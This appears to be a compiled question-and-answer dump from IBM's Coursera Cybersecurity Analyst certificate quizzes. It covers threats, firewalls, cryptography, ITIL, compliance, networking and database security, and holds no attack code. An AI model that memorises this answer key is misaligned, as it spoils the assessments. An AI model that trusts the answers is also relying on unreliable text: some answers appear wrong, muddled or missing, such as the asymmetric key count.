IBM Cybersecurity Analyst Professional Certificate
Coursera Courses | Note: These courses have a lot of spelling errors.
Introduction to Cybersecurity Tools & Cyber Attacks
Which of the following statements is True?
Passive attacks are easy to detect because of the latency created by the interception and second forwarding.
Passive attacks are hard to detect because the original message is never delivered so the receiving does not know they missed anything.
Passive attacks are hard to detect because the original message is delivered unchanged and can pass an integrity check.
Passive attacks are easy to detect because the original message wrapper must be modified by the attacker before it is forwarded on to the intended recipient.
The purpose of security services includes which three (3) of the following?
Are intended to counter security attacks.
Enhance security of data processing systems and information transfer.
Often replicate functions found in physical documents
Includes any component of your security infrastructure that has been outsourced to a third-party
Which statement best describes access control?
Protection against denial by one of the parties in communication
Protection against the unauthorized disclosure of data
Assurance that the communicating entity is the one claimed
Prevention of unauthorized use of a resource
The International Telecommunication Union (ITU) X.800 standard addresses which three (3) of the following topics?
Transmission cost sharing between member countries
Data transmission speeds
Authentication
Access Control
Data Confidentiality
Protocol suppression, ID and authentication are examples of which?
Security Architecture
Security Mechanism
Business Policy
Security Policy
The motivation for more security in open systems is driven by which three (3) of the following factors?
New requirements from the WTO, World Trade Organization
The appearence[sic] of data protection legislation in several countries.
The desire by a number of organizations to use OSI recommendations.
Society's increasing dependance[sic] on computers.
True or False: The accidental disclosure of confidential data by an employee is considered a legitimate organizational threat.
True
True or False: The accidental disclosure of confidential information by an employee is considered an attack.
True
A replay attack and a denial of service attack are examples of which?
Security architecture attack
Passive attack
Masquerade attack
Origin attack
True or False: An application that runs on your computer without your authorization but does no damage to the system is not considered malware.
False
How would you classify a piece of malicious code designed to cause damage, can self-replicate and spreads from one computer to another by attaching itself to files?
Worm
How would you classify a piece of malicious code designed to cause damage and spreads from one computer to another by attaching itself to files but requires human actions in order to replicate?
Virus
How would you classify a piece of malicious code designed collect data about a computer and its users and then report that back to a malicious actor?
Spyware
A large scale Denial of Service attack usually relies upon which of the following?
A botnet
Antivirus software can be classified as which form of threat control?
Technical controls
Which of the following measures can be used to counter a mapping attack?
Record traffic entering the network
Look for suspicious activity like IP addresses or ports being scanned sequentially.
Use a host scanner and keep an inventory of hosts on your network.
All of the above.
In order for a network card (NIC) to engage in packet sniffing, it must be running in which mode?
Promiscuous mode
Which countermeasure can be helpful in combating an IP Spoofing attack?
Ingress filtering
Enable IP Packet Authentication filtering
Keep your certificates up-to-date
Enable the IP Spoofing feature available in most commercial antivirus software.
All of the above.
Which two (2) measures can be used to counter a Denial of Service (DOS) attack?
Enable the DOS Filtering option now available on most routers and switches.
Implement a filter to remove flooded packets before they reach the host.
Use traceback to identify the source of the flooded packets.
Enable packet filtering on your firewall.
Which countermeasure should be used against a host insertion attack?
Maintain an accurate inventory of of computer hosts by MAC address.
Use a host scanning tool to match a list of discovered hosts against known hosts.
Investigate newly discovered hosts.
All of the above.
Which is not one of the phases of the intrusion kill chain?
Installation
Activation
Command and Control
Delivery
Which social engineering attack involves a person instead of a system such as an email server?
Vishing
Spectra
Phishing
Cyberwarfare
Which of the following is an example of a social engineering attack?
Logging in to the Army's missle[sic] command computer and launching a nuclear weapon.
Calling an employee and telling him you are from IT support and must observe him logging into his corporate account.
Setting up a web site offering free games, but infecting the downloads with malware.
Sending someone an email with a Trojan Horse attachment.
True or False: While many countries are preparing their military for a future cyberwar, there have been no "cyber battles" to-date.
False
Which tool did Javier say was crucial to his work as a SOC analyst?
SIEM (Security Information and Event Management): Tools like QRadar SIEM are crucial to Javier since he can use it to perform advanced corrolations and threat intelligence integration.
Which hacker organization hacked into the Democratic National Convension[sic] and released Hillery[sic] Clinton's emails?
Fancy Bears[sic]
What challenges are expected in the future?
Enhanced espionage from more countries
Far more advanced malware
New consumer technology to exploit
Why are cyber attacks using SWIFT so dangerous?
Cyber attacks using SWIFT are so dangerous as the protocol used by all banks to transfer money which risks confidential customer data
Explanation:
SWIFT used by banking institutions, where the entire banking operation is connected to a messaging network with the help of data which originally aimed at making communications between banks easier.
Although the Government had taken various measures to prevent Cyber attacks are common occurrences that steal customer data and fetch money from their account.
Hence, SWIFT, which relies on the internet and networking might backfire and be a major threat to the people.
Which statement best describes Authentication?
Assurance that a resource can be accessed and used
Assurance that the communicating entity is the one claimed
Protection against denial by one of the parties in communication
Prevention of unauthorized use of a resource
Trusted functionality, security labels, event detection, security audit trails and security recovery are all examples of which type of security mechanism?
Contingent security mechanism
Active security mechanism
External security mechanism
Passive security mechanism
If an organization responds to an intentional threat, that threat is now classified as what?
An attack
-An active threat
A malicious threat
An open case
An attack that is developed particularly for a specific customer and occurs over a long period of time is a form of what type of attack?
-Water Hole
Advanced Persistent Threat
Spectra
Denial of Service (DOS)
Which of three (3) these approaches could be used by hackers as part of a Business Email Compromise attack?
Account compromise
Attorney impersonation
Request to make a payment
CEO Fraud, where CEO sends email to an employee
Which type of actor was not one of the four types of actors mentioned in the video A brief overview of types of actors and their motives?
Black Hats
A political motivation is often attributed to which type of actor?
Hacktivist
Which type of actor hacked the 2016 US Presidential Elections?
Government
True or False: Passive attacks are easy to detect because the original messages are usually alterned or undelivered.
Cryptography, digital signatures, access controls and routing controls considered which?
-Pervasive security mechanisms
security policy
Which type of attack can be addressed using a switched Ethernet gateway and software on every host on your network that makes sure their NICs is not running in promiscuous mode.
Packet Sniffing
True or False: An individual hacks into a military computer and uses it to launch an attack on a target he personally dislikes. This is considered an act of cyberwarfare.
True or False: A tornado threatening a data center can be classified as an attack.
Traffic flow analysis is classified as which?
Passive attack
Botnets can be used to orchestrate which form of attack?
Distribution of Spam
-DDoS attacks
Phishing attacks
Distribution of Spyware
As a Malware launchpad
All of the above
Policies and training can be classified as which form of threat control?
-Administrative controls
Passive Controls
Encrypting your email is an example of addressing which aspect of the CIA Triad?
Confidentiality
Integrity
Availability
Trudy changes the meeting time in a message she intercepts from Alice before she forwards it on to Bob. This is a violation of which aspect of the CIA Triad?
Confidentiality
Integrity
Availability
You fail to backup your files and then drop your laptop breaking it into many small pieces. You have just failed to address which aspect of the CIA Triad?
Confidentiality
Integrity
Availability
The use of digital signatures is an example of which concept?
Non-repudiation
Confidentiality
Integrity
Availability
Managers in the Singapore office at your company can access documents that managers in other offices cannot access, nor can nonmanager employees in the Singapore office. Which 2 access criterial types were likely involved in setting this up?
Groups: Managers would be in a managers group.
Timeframe
Transaction type
Physical location: Location is used as an access control factor.
In incident management, an event that has a negative impact on some aspect of the network or data is called what?
Event
Attack
Incident: an event with impact
Threat
In incident management, a data inventory, data classification and data management process are part of which key concept?
Automated system
Business Continuity Plan & Disaster Recovery
E-Discovery: It is crucial to have an automated inventory of systems and data so you can know if anything changes or does not belong.
Post-Incident Activities
Which of the phase of the Incident Response Process do steps like Identify cyber security incident, Define objectives and investigate situation and Take appropriate action fall into?
Phase 1: Prepare
Phase 2: Respond
Phase 3: Follow Up]
In the context of security standards and compliance, which two (2) of these items are goals of frameworks and best practices?
They seek to improve performance, controls and metrics.
They are rules to follow for a specific industry.
They serve as an enforcement mechanism for government, industry or clients.
They help translate the business needs into technical or operational needs.
A company document that says employees may not do online shopping while at work would be which of the following?
Strategic Plan
Tactical Plan
Procedure
Policy
Which three (3) of these are compliance standards that must be adhered to by companies is some industries / countries?
HIPAA
PCI/DSS
OCTAVE
SOX
A method of evaluating computer and network security by simulating an attack on a computer system or network from external or internal threats is know as which of the following?
A threat
A white hat
A hack
A pentest
The OWASP “Top 10” provides guidance on what?
The top 10 malware exploits reported each year.
The top 10 network vulnerabilities reported each year.
The top 10 cybercrimes reported each year.
The top 10 application vulnerabilities reported each year.
Which two (2) key components are part of incident response? (Select 2)
Response team
Threat
Investigation
Attack
Which is not part of the Sans Institutes Audit process?
Deliver a report.
Define the audit scope and limitations.
Help to translate the business needs into technical or operational needs.
Feedback based on the findings.
Which key concept to understand incident response is defined as "data inventory, helps to understand the current tech status, data classification, data management, we could use automated systems. Understand how you control data retention and backup."
E-Discovery
Which is not included as part of the IT Governance process?
Tactical Plans
Procedures
Audits
Policies
A hash is a mathematical algorithm that helps assure which aspect of the CIA Triad?
Integrity
A successful DOS attack against your company’s servers is a violation of which aspect of the CIA Triad?
Availability
Which of these is an example of the concept of non-repudiation?
Alice sends a message to Bob with certainty that it was not altered while in route by Trudy.
Alice sends a message to Bob with certainty that it will be delivered.
Alice sends a message to Bob and Bob knows for a certainty that it came from Alice and no one else.
Alice sends a message to Bob and Alice is certain that it was not read by Trudy.
You have been asked to establish access to corporate documents in such a way that they can be read from anywhere, but only modified while the employees are in the office. Which 2 access criteria types were likely involved in setting this up?
Groups
Physical location
Transaction type
Timeframe
In incident management, an observed change to the normal behavior of a system, environment or process is called what?
Event
In incident management, tools like SIEM, SOA and UBA are part of which key concept?
Automated system
BCP & Disaster Recovery
Post-Incident Activities
E-Discovery
Which phase of the Incident Response Process do steps like Carry out a post incident review and Communicate and build on lessons learned fall into?
Respond
Follow Up
Prepare
In the context of security standards and compliance, which two (2) of these are considered normative and compliance items?
They seek to improve performance, controls and metrics.
They are rules to follow for a specific industry.
They help translate the business needs into technical or operational needs.
They serve as an enforcement mechanism for government, industry or clients.
A company document that details how an employee should request Internet access for her computer would be which of the following?
Procedure
Strategic Plan
Policy
Tactical Plan
Which of these is a methodology by which to conduct audits?
SOX
HIPAA
PCI/DSS
OCTAVE
Mile 2 CPTE Training teaches you how to do what?
Conduct a pentest.
Advanced network management tasks
Conduct a Ransomware attack
Construct a botnet
Which three (3) statements about OWASP are True?
OWASP stands for Open Web Application Security Project
OWASP provides tools and guidance for mobile applications.
OWASP Top 10 only lists the top 10 web application vulnerabilities but you must engage an OWASP certified partner to learn how to fix them.
OWASP provides guidance and tools to help you address web application vulnerabilities on their Top 10 list.
Firewalls contribute to the security of your network in which three (3) ways?
Prevent unauthorized modifications to internal data from an outside actor.
Allow only authorized access to inside the network.
Prevent an internal user from downloading data she is not authorized to access.
Prevent Denial of Service (DOS) attacks.
Which packets are selected for inspection by a packet filtering firewall?
Every packet entering or leaving a network.
The first packet of every transmission but only subsequent packets when “high risk” protocols are used.
Every packet entering the network but no packets leaving the network.
The first packet in any transmission, whether entering or leaving.
True or False: Application Gateways are an effective way to control which individuals can establish telnet connections through the gateway.
Why are XML gateways used?
XML packet headers are different from that of other protocols and often “confuse” conventional firewalls.
Conventional firewalls attempt to execute XML code as instructions to the firewall.
XML traffic cannot pass through a conventional firewall.
XML traffic passes through conventional firewalls without inspection.
Which three (3) things are True about Stateless firewalls?
They filter packets based upon Layer 3 and 4 information only (IP address and Port number)
They are faster than Stateful firewalls.
They maintain tables that allow them to compare current packets with previous packets.
They are also known as packet-filtering firewalls.
True or False: Most Antivirus/Antimalware software works by comparing each file encountered on your system against a compressed (zipped) version of known malware maintained by the vendor on the local host.
How many unique encryption keys are required for 2 people to exchange a series of messages using asymmetric public key cryptography?
4
What is Cryptographic Strength?
Relies on math, not secrecy
Ciphers that have stood the test of time are public algorithms.
Exclusive Or (XOR) is the “secret sauce” behind modern encryption.
All of the above.
What is the primary difference between Symmetric and Asymmetric encryption?
The same key is used to both encrypt and decrypt the message.
Which type of cryptographic attack is characterized by an attack based upon trial an error where many millions of keys may be attempted in order to break the encrypted message?
brute-force
What is the correct sequence of steps required for Alice to send a message to Bob using asymmetric encryption?
Alice requests Bob’s public key and uses it to encrypt her message. Alice then sends the encrypted message to Bob who decrypts it using his private key.
A skilled penetration tester wants to show her employer how smart she is in hopes of getting a promotion. Without obtaining permission, she hacks into the company’s new online store to see if there are any weaknesses that can be hardened before the system goes live. She does not do any damage and writes a useful report which she sends over her boss’s head to the CISO. What color hat was she wearing?
A White Hat
A Gray Hat
A Black Hat
A Pink Hat
A Rainbow Hat
Which three (3) are resources that are available to help guide penetration testing efforts by cybersecurity specialists?
General Data Protection Regulation (GDPR)
Open Source Security Testing Methodology Manual (OSSTMM).
NIST SP 800-42 Guidelines on Network Security Testing.
Information Systems Security Assessment Framework (ISSAF)
According to the Vulnerability Assessment Methodology, Potential Impacts are determined by which 2 factors?
Identify Indicators and Exposure
Exposure and Sensitivity
Potential Impacts and Adaptive Capacity
Sensitivity and Adaptive Capacity
In digital forensics, the term Chain of Custody refers to what?
This is a digital “chain” that isolated digital evidence from being disturbed until it can be analyzed by the police or other authorities.
This is a physical chain that is place around a crime scene to protect the evidence from being disturbed.
The record that documents the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence.
This chain of custody is simply a written record of who possessed the evidence as it moves from collection to analysis to presentation in a court of law.
What is the primary function of a firewall?
Scans the system and search for matches against the malware definitions.
Secures communication that may be understood by the intended recipient only.
Filter traffic between networks.
Uses malware definitions.
What is Locard's exchange principle?
The perpetrator of a crime will bring something into the crime scene and leave with something from it, and that both can be used as forensic evidence.
Which two (2) are types of firewall?
Protocol-filtering
Packet-filtering
Statutory
Application-level
Which type of data does a packet-filtering firewall inspect when it decides whether to forward or drop a packet?
Source and destination IP addresses.
TCP/UDP source and destination port numbers.
ICMP message type.
TCP SYN and ACK bits.
All of the above.
Which three (3) of the following are limitations of Application gateways?
Application gateways are susceptible to IP spoofing.
Each application to be managed needs its own gateway.
Client software must be “smart” and know to contact the gateway.
Application gateways are not good and understanding protocols such as telnet.
Which type of firewall inspects XML packet payloads for things like executable code, a target IP address that make sense, and a known source IP address?
An XML Gateway.
An application-level firewall.
A packet-filtering firewall.
All of the above.
Which statement about Stateful firewalls is True?
They have state tables that allow them to compare current packets with previous packets.
They are less secure in general than Stateless firewalls.
They are faster than Stateless firewalls.
All of the above.
True or False: Most Antivirus/Antimalware software works by comparing a hash of every file encountered on your system against a table of hashes of known virus and malware previously made by the antivirus/antimalware vendor.
Which type of cryptographic attack is characterized by comparing a captured hashed password against a table of many millions of previously hashed words or strings?
Social Engineering
Brute force
Rainbow Tables
Known Plaintext
Known Ciphertext
What are two (2) drawbacks to using symmetric key encryption?
A modern supercomputer can break even the most advanced symmetric key in a matter of minutes.
The sender and recipient must find a secure way to share the key itself.
Symmetric key encryption is slower than asymmetric key encryption.
You need to use a different encryption key with everyone you communicate with, otherwise anyone who has ever received an encrypted message from you could open any message you sent to anyone else using that key.
Cybersecurity Roles, Processes & Operating System Security
The statement: “The protection of computer systems from theft or damage to the hardware, software or information on them, as well as from disruption or misdirection of the services they provide.” Is a good definition for what?
IT Security
When looking at security standard and compliance, which three (3) are characteristics of best practices, baselines and frameworks?
They are rules to follow for a specific industry.
They seek to improve performance, controls and metrics.
They enforce government, industry or client regulations.
They are used to improved controls, methodologies and governance for the IT department.
They help translate the business needs into technical or operational needs.
Which three (3) of these roles would likely exist in an Information Security organization?
Regional Sales Executive
Product Development Manager
CISO, Chief Information Security Officer
Vulnerability Assessor
Director of Human Resources
Information Security Architect
In the video Introduction to Process, which three (3) items were called out as critical to the success of a Security Operations Center (SOC)?
People
Process
Tools
Uninterruptible Power Supplies for all critical systems.
Bandwidth
Faraday Cages
Process performance metrics typically measure items in which four (4) categories?
Rework
Parts Inventory on hand
Backlog of pending orders
Quality (defect rate)
Injuries
Cost
Cycle time
Service Portfolio Management, Financial Management, Demand Management and Business Relationship Management belong to which ITIL Service Lifecycle Phase?
Service Design
Service Improvement
Service Operations
Service Strategy
Service Transition
Log, Assign, Track, Categorize, Prioritize, Resolve and Close are all steps in which ITIL process?
Change Management
Problem Management
Incident Management
Event Management
What critical item is noted when discussing process roles?
Separation of duties is critical; the approver should not be the requester.
Service Operations: Event Management, Incident Management, Problem Management
Service Design: Service Catalogue Management, Service Level Management, InfoSec Management, Supplier Management
The process in ITIL where changes are released to an IT environment is called what?
Release Management
Which two (2) processes are operational processes? (Select 2)
Change Management
Incident Management
Availability Management
Financial Management
Which two (2) of these are considered best practices? (Select 2)
ITIL
Project Manager methodologies
HIPAA
SOX
Which service management process has the responsibility of understanding the root cause of a problem?
Problem Management
Change Management
Incident Management
Configuration Management
In the video What is IT Security, Elio Sanabria Echeverria put forth a definition that included which factors?
The protection of computer hardware.
The protection of computer software.
The protection of data.
The disruption or misdirection of services provided by your systems.
All of the above.
This description belongs to which information security role? “This position is in charge of testing the effectiveness of computer information systems, including the security of the systems and reports their findings.”
Information Security Auditor
Which of these statements more accurately conveys what was stated in the video Introduction to Process?
As volumes of security alerts and false positives grow, more burden is placed upon Security Analysts & Incident Response teams.
Solid and well documented security processes are making the role of the security analyst increasingly obsolete.
As security monitoring and analysis tools advance and incorporate artificial intelligence, Information Security organizations are challenged to find new work for underutilized security analysts.
Continual Process Improvement consists of which four (4) items? (Select 4)
Financial performance
Maturity Assessments
Customer Feedback
Process Metrics
Focus Group studies
Market Research
Legal Review
Event Management, Incident Management, and Problem Management belong to which ITIL Service Lifecycle Phase?
Service Transition
Service Improvement
Service Design
Service Strategy
Service Operations
Maintaining Information Security Policy (ISP) and specific security policies that address each aspect of strategy, objectives and regulations is the part of which ITIL process?
Problem Management
Change Management
Service Level Management
Information Security Management
Which aspect of the CIA Triad would cover preserving authorized restrictions on information access and disclosure?
Confidentiality
A message that Bob receives from Alice is genuine and can be verified as such demonstrates which key property?
Authenticity
Which is the correct order for gaining access to a resource?
Authentication Identification, Authorization, Accountability
Identification, Authentication, Authorization, Accountability
Identification, Authorization, Authentication, Accountability
Accountability, Identification, Authentication, Authorization
Which type of method would include something you know, such as a password?
Accountability
Authentication: something you know, something you have, something you are
Identification
Authorization
Which three (3) are common methods of access control?
Role Based Access Control (RBAC): assigns access based upon the roles assigned to an individual
Perimeter Access Control (PAC)
Mandatory Access Control (MAC): common form that uses labels to restrict access
CIA Triad Access Control (CTAC)
Discretionary Access Control (DAC): requires the creator of any object to assign access controls to that object
Which three (3) items would be considered Physical Access Control methods?
Perimetral
Access Control Lists (ACL) - logical control
Work areas
Password policies - logical control
Building
Which is an example of technical uses of physcial[sic] security controls?
Tokens
Tramps
Lists and logs
All of the above.
Hamid has access to certain resources because he is a Quality Control Inspector and he has access to other resources because he is the manager of that team. Which form of access control is his company most likely using?
RBAC
Which type of method would include something you are, such as a fingerprint?
Authentication
How many unique address spaces are used by applications running in kernel mode?
1: All applications run in the same shared address space in Kernel mode
Which two (2) of these file systems could you use to format a 64 GB USB drive?
FAT32 && NTFS
Where does Windows 10 store 64-bit applications?
\Program Files
Where does Windows 10 store 32-bit applications?
\Program Files (x86)
Which three (3) groups can "own" a file in Linux?
user, group, everybody
What application can you use to see all the active running applications and processes on macOS?
Activity Monitor
What feature in macOS prevents unauthorized applications from being installed?
Gatekeeper
Which three (3) utilities are found when booting macOS to the recovery partition? (Select 3)
Safari
Disk Utility
Time Machine
Cybersecurity Compliance Framework & System Administration
A security attack is defined as which of the following?
An event that has been reviewed by analysts and deemed worthy of deeper investigation.
All cybersecurity events.
An event on a system or network detected by a device.
An event that has been identified by correlation and analytics tools as a malicious activity.
Which order does a typical compliance process follow?
Establish scope, readiness assessment, gap remediation, testing/auditing, management reporting
Under GDPR who determines the purpose and means of processing of personal data?
Controller
Under the International Organization for Standardization (ISO) which standard focuses on Privacy?
ISO 27018
What is an auditor looking for when they test control the control for implementation over an entire offering with no gaps?
Completeness
The HIPAA Security Rule requires covered entities to maintain which three (3) reasonable safeguards for protecting e-PHI?
administrative
physical
technical
HIPAA Administrative safeguards include which two (2) of the following?
Workforce training and management
Security Personnel
Who is the governing entity for HIPAA?
US Department of Health and Human Services Office of Civil Rights
HIPAA Physical safeguards include which two (2) of the following?
Facility Access and Control
Workstation and Device Security
PCI uses which three (3) of the following Card Holder Data Environment categories to determine scope?
Processes
Technology
People
One PCI Requirement is using an approved scanning vendor to scan at what frequency?
Quarterly
In which CIS control category will you find Incident Response and Management?
Organizational
Which is NOT an example of a client?
e-mail Server
Which three (3) threat key factors should be considered when looking at an Endpoint Security Solution?
detection response, user education, threat hunting
Which two types of updates do most organizations patch as soon as possible after testing?
Security and Critical
A patch is a set of changes to a computer program or its data designed for which three (3) functions?
improve, fix, update
Which three (3) are common Endpoint attack types?
Spear Phishing
Whale hunting
Ad Network
Which three (3) of the following steps can be taken to help protect sensitive Windows domain accounts? (Select 3)
Disable the account delegation rights for administrator accounts.
Grant user logon access to servers and workstations.
Create dedicated workstation hosts without Internet and email access.
Separate administrator accounts from user accounts.
Network Security & Database Vulnerabilities
Which network layer do IP addresses belong to?
The Network Layer
Which address assures a packet is delivered to a computer on a different network segment from the sender?
The IP Address
A network device that is capable of sending and receiving data at the same time is referred to as which of the following?
Full duplex
True or False: Collision avoidance protocols are critical to the smooth operation of modern networks.
Comparing bridges with switches, which are three (3) characteristics specific to a bridge?
End-user devices share bandwidth on each port.
Virtual LANs are not possible.
Half-duplex transmission.
ARP tables only keep track of addresses within the node's broadcast domain
If a network server has four (4) network interface cards, how many MAC addresses will be associated with that server?
4
True or False: When you connect your laptop to a new network, a new IP address will be assigned.
What does the Address Resolution Protocol (ARP) do when it needs to send a message to a location that is outside its broadcast domain?
ARP sends the message to the MAC address of the default gateway.
Routing tables are maintained by which of the following devices?
On any network connected device.
What is the purpose of a default gateway?
It forwards messages coming from, or going to, external networks.
If a message is being sent to a computer that is identified in the computer's routing table, what type of connection would be established?
Direct
What is meant by "stateless" packet inspection?
It is a packet-by-packet inspection with no awareness of previous packets.
True or False: An Intrusion Detection System (IDS) is generally a passive device that listens to network traffic and alerts an administrator when a potential problem is detected?
True or False: The primary difference between an Intrusion Detection System (IDS) and an Intrusion Prevention System (IPS) is that an IDS is designed as a passive system that listens and alerts while an IPS is an active system that is designed to take action when a problem is detected?
Which intrusion system does not add any delay to network traffic?
IDS
How does using Network Address Translation (NAT) provide an additional layer of security to your network?
By hiding the real IP addresses of all the devices on your private network and exposing only a single public IP address.
Which type of NAT routing maps unregistered IP addresses to a single registered IP address allowing thousands of users to be connected to the Internet using only a single global IP address?
Overload
Which network layer do MAC addresses belong to?
Data Link
Which address assures a packet is delivered to a computer on the same network segment as the sender?
The MAC address.
A network device that cannot send and receive data at the same time is referred to as which of the following?
Half duplex
When a NIC reads a packet header and sees the destination address is not its own address, what does it do with the packet?
It discards the packet.
Comparing bridges with switches, which are three (3) characteristics specific to a switch?
Virtual LANs are possible.
Each port is dedicated to a single device; bandwidth is not shared.
Full-duplex transmission.
True or False: Switches can connect two geographically dispersed networks.
A network interface card's MAC address is also known by which two (2) of the following?
The physical address.
The burn address.
What is the main function of the Address Resolution Protocol (ARP)?
To translate a MAC address to an IP address and vice versa.
What does a router do when it needs to send a packet to an address that is not in its routing table?
It forwards the packet to the default gateway.
What happens to messages sent from a computer that has no gateway address specified?
Messages sent to other computers on the same subnet will be delivered but those destined to computers on other networks will not be delivered.
Which three (3) are types of routes found in a routing table?
Direct
Dynamic
Default
The IP address range goes from 0.0.0.0 to 255.255.255.255 and is known as the "four octets". Why are these 4 numbers called octets?
The number 255 in decimal takes up 8 digits in binary.
How many octets are used to define the network portion of the IP address in a Class C network?
3
True or False: A routable protocol is a protocol whose packets may leave your network, pass through your router, and be delivered to a remote network.
True or False: The destination address is defined in the packet header but the source address is in the packet footer.
Which network mask belongs to a Class A network?
255.0.0.0
What is the primary function of DNS?
To translate domain names to IP addresses and vice versa.
How does a new endpoint know the address of the DHCP server?
The endpoint sends a DHCP Discover broadcast request to all endpoints on the local network.
Which Syslog layer contains the actual message contents?
Syslog Content
True or False: Setting the correct Syslog Severity Level on systems helps keep the Syslog server from being flooded by the millions of messages that could be generated by these systems.
True or False: The Syslog message typically includes the severity level, facility code, originator process ID, a time stamp, and the hostname or IP address of the originator device.
Why is port mirroring used?
To provide a stream of all data entering or leaving a specific port for debugging or analysis work.
What is the main difference between a Next Generation Firewall (NGFW) and a traditional firewall?
NGFW use sessions.
True or False: Unlike traditional stateful firewalls, next-generation firewalls drill into traffic to identify the applications traversing the network.
What are the two (2) primary methods used by Intrusion Prevention Systems (IPS) to discover an exploit?
Statistical anomaly-based detection.
Signature-based detection.
If your nontechnical manager told you that you must configure your traditional second-generation firewalls to block all users on your network from posting messages on Facebook from their office computers, how would you carry out this request?
You would have to block any IP addresses used by Facebook.
How does an endpoint know the address of the DNS server?
It is manually configured in the network settings by the administrator or obtained from the DHCP server.
What is the primary function of DHCP?
To automatically assign IP addresses to systems.
Which Syslog layer would handles the routing and storage of a Syslog message?
Syslog Application
Which of the following flow data are gathered by utilities such as NetFlow?
Packet count and byte count.
Source and destination TCP/UDP ports.
Source and destination IP addresses.
Routing and peering data such as TCP flags and protocol.
All of the above.
When a network interface card in operating in promiscuous mode, what action does it take?
The NIC sends all packets to the CPU for processing instead of only those packets indicated for its MAC address.
If a packet is allowed to pass through a NGFW based upon the established firewall rules and a new session is established, how does the NGFW treat the next packet it encounters from the same session?
Subsequent packets of the same session are automatically allowed.
If your nontechnical manager told you that you must configure your next generation firewalls (NGFW) to block all users on your network from posting messages on Facebook from their office computers, what would be the consequence of carrying out his order?
No serious consequence, application-level inspection and blocking can be configured.
Monitoring network traffic and comparing it against an established baseline for normal use is an example of which form of intrusion detection?
Statistical anomaly-based detection
Which are three (3) characteristics of a highly available system?
Redundancy
Failover
Monitoring
True or False: If all of your organization's data is centralized in a small number of data centers, than focusing security on perimiter defense is adequate to assure your data is safe.
Which two (2) of the following data source types are considered structured data?
Data warehouses
Distributed databases
Data that has not been organized into a specialized repository, but does have associated information, such as metadata that makes it more amenable to processing than raw data, is an example of which data model type?
Semi-structured data
How are the tables in a relational database linked together?
Through the use of primary and foreign keys.
In the video Securing the Crown Jewels, the "Identification and Baseline" phase contains which three (3) of the following items?
Vulnerability Assessment
Blocking & Quarantine
Activity Monitoring
Discovery & Classification
Entitlements Reporting
In the video Securing the Crown Jewels, the "Real-Time Monitor & Protection" phase contains which three (3) of the following items?
Activity Monitoring
Blocking & Quarantine
Dynamic Data Masking
In the video Securing the Crown Jewels, the "Raise Bar" phase contains:
Reconfigure, Mask & Encrypt
In the video Leveraging Security Industry Best Practices, which US Government agency is a co-publisher of the Database Security Requirements Guide (SRG)?
Department of Defense (DoD)
For added security, a firewall is often placed between which of these?
The database and the hardened data repository.
True or False: In a vulnerability assessment test, a new commercial database installed on a new instance of a major operating system should pass 80-90% of the vulnerability tests out-of-the-box unless there is a major flaw or breach.
Which of these hosting environments requires the enterprise to manage the largest number of different data sources?
on prem
While data security is an ongoing process, what is the correct order to consider these steps?
Discover, Harden, Monitor & Protect, Repeat
In setting up policy rules for data monitoring, what is the purpose of "exclude" rules?
To exclude certain applications or safe activities from being logged.
True or False: Data monitoring products such as IBM Guardium can send access alerts to syslog for manual intervention by a security analyst but must be connected to addition applications if automated interventions are desired.
To created auditable reports of data access using the IBM Guardium product, the administrator would do which of the following?
Use the Audit Process Builder feature to automate the reporting process.
True or False: The IBM Guardium monitoring applications is capable of monitoring activities in non-relational databases such as Hadoop, Cognos, and Spark.
At a minimum, which 3 entities should be captured in any event log?
When the activity took place.
What activity took place.
Who or what committed the activity.
True of False: In the IBM Guardium data monitoring tool, the number of failed login attempts that would trigger an alert are always counted since the last successful login.
Which activity should be considered suspicious and might indicate inappropriate activity is being attempted?
Attempts are made to access data using nonstandard tools, such as MS Excel or MS Access, rather than through the application the data belongs to.
Which two (2) activities should be considered suspicious and warrant further investigation?
Use of an Application ID from an IP that is different from what has been specified by the application owner.
Use of an Application ID from a hostname that is different from what has been specified by the application owner.
Distributed databases, data warehouses, big data, and File shares are all classified as what?
Data source types
Hadoop, MongoDB, and BigTable are all examples of which data source type?
Big data databases
Data that has been organized into a formatted repository, typically a database, so its elements can be made addressable, is an example of which data model type?
Structured data
Which of the following is the primary difference between a flat file database and a relational database?
All the data in a flat file database is stored in a single table.
In the video Leveraging Security Industry Best Practices, where would you turn to look for help on establishing security benchmarks for your database?
not Department of Defense/Defence Information Systems Agency (DoD/DISA).
Center for Internet Security (CIS).
Most of the time, how do users access data?
Through an application.
True or False: In a vulnerability assessment test, it is not uncommon to fail more than 50% of the tests before the operating system and database are hardened.
Which of these hosting environments requires the service provider to manage the largest number of different data sources?
SaaS
While data security is an ongoing process, what is the correct order to consider these steps?
Identification & Baseline, Raise the Bar, Real-time Monitor & Protection
To automatically terminate a session if an attempt is made to access data in a sensitive table, such as Social Security (SSN) ID numbers, you would set up which type of rule?
not terminate
An Access rule.
True or False: Data monitoring products such as IBM Guarduim are fully capable of blocking access to sensitive data based upon access parameters configured in policy rules.
In which two (2) ways can security events collected by a data monitoring tool be logged to a security incident and event management (SIEM) system?'
Configure the monitoring system to write to the SIEM systems syslog file.
Configure bidirectional communication between the monitoring and SIEM systems, if available.
Export security events from your monitoring tool and import them into your SIEM tool.
Configure your SIEM system to read the monitoring systems local syslog file.
True or False: Data monitoring tools such as IBM Guardium are designed to monitor activities within a database, but external products, such as a privileged identity management (PIM) tool would be required to monitor changes to the data monitoring tool itself, such as the addition of new users or the alteration of existing user accounts.
True or False: In the IBM Guardium data monitoring tool, it is possible to create a report that shows not only how many SQL unauthorized access attempts were made by an individual, but also exactly which SQL statements were disallowed.
Which activity should be considered suspicious and might indicate inappropriate activity is being attempted?
Attempts are made to SELECT lists of usernames and passwords by a non-administrator account.
Which two (2) activities should be considered suspicious and warrant further investigation?
The data monitoring logging system was manually shut down.
There were attempts to purge event logs.
It takes an authorized user 3 attempts to enter the correct password.
An authorized user attempts to run SQL statements with invalid syntax.
Which operating system is susceptible to OS Command Injection attacks?
All
What is a possible impact of running commands thought OS shell interpreters such as sh, bash, cmd.exe and powershell.exe?
It makes it easier for a hacker to inject additional commands or arguments.
True or False: Safe coding practice avoids using OS commands when it can be avoided.
True or False: Safe coding practice always runs commands through a shell interpreter.
True or False: Safe coding practice uses library functions when running OS commands.
True or False: Safe coding practice uses blacklists and avoids the use of whitelists.
A hacker tailoring his actions based on the database errors the application displays is an example of which type of SQL Injection attack?
True or False: Use of prepared statements is an effective mitigation against SQL Injection attacks because it seperates the query structure from the query parameters.
True or False: Native database errors should be hidden from the user to prevent hackers from gaining insight into the internal structure of your application.
